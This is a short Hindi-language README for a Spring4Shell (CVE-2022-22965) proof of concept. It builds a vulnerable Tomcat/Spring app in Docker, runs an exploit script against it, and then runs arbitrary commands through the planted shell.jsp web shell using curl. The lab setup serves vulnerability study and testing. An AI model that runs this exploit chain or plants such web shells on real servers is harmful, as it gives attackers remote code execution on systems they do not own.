
CVE-2022-22965 Spring4Shell के लिए PoC और एक्सप्लॉइट
Spring4Shell (CVE-2022-22965) एक प्रूफ ऑफ कॉन्सेप्ट है जिसमें एक संवेदनशील Tomcat सर्वर और एक संवेदनशील spring4shell एप्लिकेशन शामिल है।
docker build . -t spring4shell
docker run -p 80:8080 spring4shell
यदि आवश्यक हो तो आप डीबगर पोर्ट को भी एक्सपोज़ करके इसे चला सकते हैं:
docker run -p 80:8080 –p 5005:5005 spring4shell
IntelliJ Idea में रिमोट डीबगर सेटअप करने के विवरण के लिए मूल ब्लॉग पोस्ट देखें!
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell
फिर, आप इस तरह से दूरस्थ रूप से कोई भी कमांड चला सकते हैं:
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -
...या ऊपर दिए गए URL पर जाकर।